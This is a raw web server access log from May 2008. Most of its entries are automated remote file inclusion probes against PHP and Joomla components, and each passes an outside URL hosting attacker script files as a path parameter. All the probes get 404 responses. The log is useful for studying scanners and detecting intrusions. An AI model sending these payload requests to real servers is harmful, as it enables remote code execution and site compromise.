67.15.205.17 - - [04/May/2008:19:02:03 -0600] "GET /logs/access_log.20080427/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.811"
201.12.151.34 - - [04/May/2008:19:02:06 -0600] "GET /logs/access_log.20080427/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://bsthank.t35.com/CMDs/xigor.txt????? HTTP/1.1" 404 281 "-" "libwww-perl/5.800"
208.116.44.60 - - [04/May/2008:19:02:16 -0600] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.811"
208.116.44.60 - - [04/May/2008:19:02:16 -0600] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
67.15.205.17 - - [04/May/2008:19:02:29 -0600] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.3alamyat.com/chat/photos/0/safe.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.811"
200.160.251.134 - - [04/May/2008:19:02:54 -0600] "GET /logs/access_log.20080427/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://h4x0rs.site88.net/id.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.805"
221.128.79.156 - - [04/May/2008:19:05:43 -0600] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:19:05:43 -0600] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/c?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
221.128.79.156 - - [04/May/2008:19:05:44 -0600] "GET /logs/http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
221.128.79.156 - - [04/May/2008:19:05:44 -0600] "GET /http://www.mmf.selcuk.edu.tr/cevre/eski/ogrgor/eesmeray/test.txt??? HTTP/1.1" 404 270 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
205.234.130.198 - - [04/May/2008:19:07:30 -0600] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 256 "-" "libwww-perl/5.811"
67.15.205.17 - - [04/May/2008:19:10:01 -0600] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 266 "-" "libwww-perl/5.811"
67.15.205.17 - - [04/May/2008:19:14:40 -0600] "GET /logs/access_log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 282 "-" "libwww-perl/5.811"
67.15.205.17 - - [04/May/2008:19:14:41 -0600] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 271 "-" "libwww-perl/5.811"
67.15.205.17 - - [04/May/2008:19:15:15 -0600] "GET /logs/access_log.20080413//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 291 "-" "libwww-perl/5.811"
59.106.19.213 - - [04/May/2008:19:15:55 -0600] "GET //common/db.php?commonpath=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
83.137.192.95 - - [04/May/2008:19:16:35 -0600] "GET /logs/convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 227 "-" "libwww-perl/5.800"
83.137.192.95 - - [04/May/2008:19:16:35 -0600] "GET /logs/convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 227 "-" "libwww-perl/5.800"
83.137.192.95 - - [04/May/2008:19:16:36 -0600] "GET /convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile03.jpg?? HTTP/1.1" 404 222 "-" "libwww-perl/5.800"
83.137.192.95 - - [04/May/2008:19:16:36 -0600] "GET /convert/mvcw.php?step=1&vwar_root=ftp://128.175.10.3/incoming/smile01.jpg?? HTTP/1.1" 404 222 "-" "libwww-perl/5.800"
208.112.43.2 - - [04/May/2008:19:17:07 -0600] "GET /logs/error_log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.65"
208.112.43.2 - - [04/May/2008:19:17:07 -0600] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.65"
208.112.43.2 - - [04/May/2008:19:17:07 -0600] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
205.234.130.198 - - [04/May/2008:19:17:41 -0600] "GET /logs/error_log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 271 "-" "libwww-perl/5.811"
205.234.130.198 - - [04/May/2008:19:17:41 -0600] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 261 "-" "libwww-perl/5.811"
205.234.130.198 - - [04/May/2008:19:17:49 -0600] "GET /logs/access_log.20080427/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 281 "-" "libwww-perl/5.811"
80.71.36.82 - - [04/May/2008:19:18:59 -0600] "GET //%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
80.71.36.82 - - [04/May/2008:19:19:00 -0600] "GET /logs/error_log.20080406//%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 288 "-" "libwww-perl/5.805"
80.71.36.82 - - [04/May/2008:19:19:00 -0600] "GET //%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 264 "-" "libwww-perl/5.805"
80.71.36.82 - - [04/May/2008:19:19:00 -0600] "GET /logs//%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
208.112.43.2 - - [04/May/2008:19:19:40 -0600] "GET /logs/access_log.20080427//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.65"
80.71.36.82 - - [04/May/2008:19:19:56 -0600] "GET /logs/access_log.20080406//%3Cwbr%20/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
67.15.205.17 - - [04/May/2008:19:20:03 -0600] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 251 "-" "libwww-perl/5.811"
67.15.205.17 - - [04/May/2008:19:20:03 -0600] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 246 "-" "libwww-perl/5.811"
59.106.19.213 - - [04/May/2008:19:22:31 -0600] "GET /logs/access_log.20080413//common/db.php?commonpath=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
59.106.19.213 - - [04/May/2008:19:22:31 -0600] "GET //common/db.php?commonpath=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
59.106.19.213 - - [04/May/2008:19:22:31 -0600] "GET /logs//common/db.php?commonpath=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
66.232.156.130 - - [04/May/2008:19:24:35 -0600] "GET /logs/access_log.20080420//Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
66.232.156.130 - - [04/May/2008:19:24:35 -0600] "GET //Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
66.232.156.130 - - [04/May/2008:19:24:35 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
66.232.156.130 - - [04/May/2008:19:24:36 -0600] "GET /logs/error_log.20080420//Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.810"
205.234.130.198 - - [04/May/2008:19:25:40 -0600] "GET /co.uk/index.php?site=http://www.rites.com/calls/excel/mail.gif?? HTTP/1.1" 404 221 "-" "libwww-perl/5.811"
196.40.71.237 - - [04/May/2008:19:25:55 -0600] "GET /logs/error_log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.69"
196.40.71.237 - - [04/May/2008:19:25:55 -0600] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.69"
196.40.71.237 - - [04/May/2008:19:25:56 -0600] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.69"
66.232.156.130 - - [04/May/2008:19:27:18 -0600] "GET //Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
80.71.36.82 - - [04/May/2008:19:27:55 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
80.71.36.82 - - [04/May/2008:19:28:05 -0600] "GET /logs/error_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.805"
80.71.36.82 - - [04/May/2008:19:28:06 -0600] "GET //FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
80.71.36.82 - - [04/May/2008:19:28:06 -0600] "GET /logs//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
80.71.36.82 - - [04/May/2008:19:28:07 -0600] "GET /logs/access_log.20080406//FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
74.6.18.217 - - [04/May/2008:19:28:35 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.9.155 - - [04/May/2008:19:28:36 -0600] "GET /logs/?D=A HTTP/1.0" 200 2233 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
196.209.251.3 - - [04/May/2008:19:28:45 -0600] "GET /logs/access_log.20080413//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 245 "-" "libwww-perl/5.76"
196.209.251.3 - - [04/May/2008:19:28:46 -0600] "GET //common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 220 "-" "libwww-perl/5.76"
196.209.251.3 - - [04/May/2008:19:28:47 -0600] "GET /logs//common/db.php?commonpath=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.76"
66.232.156.130 - - [04/May/2008:19:29:43 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.810"
66.232.156.130 - - [04/May/2008:19:29:43 -0600] "GET //Neos_Chronos/header.php?base_folder=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.810"
67.15.205.17 - - [04/May/2008:19:31:09 -0600] "GET /logs/error_log.20080406/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 270 "-" "libwww-perl/5.811"
59.106.19.213 - - [04/May/2008:19:31:40 -0600] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
67.15.205.17 - - [04/May/2008:19:31:42 -0600] "GET /logs/access_log.20080406/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 271 "-" "libwww-perl/5.811"
196.38.88.68 - - [04/May/2008:19:32:35 -0600] "GET /logs/access_log/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
196.38.88.68 - - [04/May/2008:19:32:36 -0600] "GET /index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.808"
196.38.88.68 - - [04/May/2008:19:32:36 -0600] "GET /logs/index1.php?p=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
89.111.173.45 - - [04/May/2008:19:33:12 -0600] "GET //admincp/auth/checklogin.php?cfgProgDir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
196.40.71.237 - - [04/May/2008:19:34:20 -0600] "GET /logs/access_log.20080427//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 288 "-" "libwww-perl/5.69"
203.23.237.236 - - [04/May/2008:19:34:57 -0600] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
203.23.237.236 - - [04/May/2008:19:34:58 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
203.146.251.123 - - [04/May/2008:19:35:24 -0600] "GET /logs/access_log/index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
203.146.251.123 - - [04/May/2008:19:35:24 -0600] "GET /index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.65"
203.146.251.123 - - [04/May/2008:19:35:25 -0600] "GET /logs/index1.php?p=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 233 "-" "libwww-perl/5.65"
203.23.237.236 - - [04/May/2008:19:37:02 -0600] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://kozhevatov.ru/board/.../id/dodol.txt?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
207.58.131.61 - - [04/May/2008:19:37:18 -0600] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.i-promo.info/test.txt? HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
207.58.131.61 - - [04/May/2008:19:37:18 -0600] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.i-promo.info/test.txt? HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
67.59.151.227 - - [04/May/2008:19:38:16 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:19:38:16 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:19:38:16 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
69.61.37.254 - - [04/May/2008:19:38:17 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:19:38:17 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:19:38:17 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:19:38:17 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:19:38:17 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:19:38:17 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
67.59.151.227 - - [04/May/2008:19:38:18 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:19:38:18 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:19:38:18 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
208.112.43.2 - - [04/May/2008:19:38:18 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
208.112.43.2 - - [04/May/2008:19:38:18 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
208.112.43.2 - - [04/May/2008:19:38:18 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
91.121.101.163 - - [04/May/2008:19:38:30 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
91.121.101.163 - - [04/May/2008:19:38:30 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
91.121.101.163 - - [04/May/2008:19:38:30 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
91.121.101.163 - - [04/May/2008:19:38:30 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
91.121.101.163 - - [04/May/2008:19:38:30 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
91.121.101.163 - - [04/May/2008:19:38:30 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
69.61.37.254 - - [04/May/2008:19:38:52 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
67.59.151.227 - - [04/May/2008:19:38:52 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
69.61.37.254 - - [04/May/2008:19:38:52 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
67.59.151.227 - - [04/May/2008:19:38:52 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
208.112.43.2 - - [04/May/2008:19:38:55 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.65"
213.149.32.24 - - [04/May/2008:19:39:03 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:19:39:04 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
213.149.32.24 - - [04/May/2008:19:39:04 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
72.36.179.98 - - [04/May/2008:19:39:06 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:19:39:06 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:19:39:06 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:19:39:10 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:19:39:10 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:19:39:10 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.810"
91.121.101.163 - - [04/May/2008:19:39:17 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
91.121.101.163 - - [04/May/2008:19:39:17 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.803"
72.36.179.98 - - [04/May/2008:19:39:41 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
72.36.179.98 - - [04/May/2008:19:39:47 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.810"
213.149.32.24 - - [04/May/2008:19:39:56 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:19:39:58 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:19:39:58 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
85.19.150.85 - - [04/May/2008:19:39:58 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
67.195.37.183 - - [04/May/2008:19:40:03 -0600] "GET /logs/access_log.20080127 HTTP/1.0" 404 218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.233.89.217 - - [04/May/2008:19:40:18 -0600] "GET /logs/access_log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
211.233.89.217 - - [04/May/2008:19:40:19 -0600] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
211.233.89.217 - - [04/May/2008:19:40:19 -0600] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
208.112.43.2 - - [04/May/2008:19:40:24 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.65"
69.61.37.254 - - [04/May/2008:19:40:28 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
69.61.37.254 - - [04/May/2008:19:40:29 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
67.59.151.227 - - [04/May/2008:19:40:35 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
67.59.151.227 - - [04/May/2008:19:40:35 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
200.80.42.159 - - [04/May/2008:19:40:56 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:40:56 -0600] "GET /logs/error_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:40:57 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:40:57 -0600] "GET //skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:40:57 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
200.80.42.159 - - [04/May/2008:19:40:57 -0600] "GET /logs//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
72.36.179.98 - - [04/May/2008:19:41:11 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
85.19.150.85 - - [04/May/2008:19:41:13 -0600] "GET /logs/access_log.20080420//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
72.36.179.98 - - [04/May/2008:19:41:15 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
91.121.101.163 - - [04/May/2008:19:41:15 -0600] "GET /logs/error_log.20080330//skin/zero_vote/error.php?dir=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
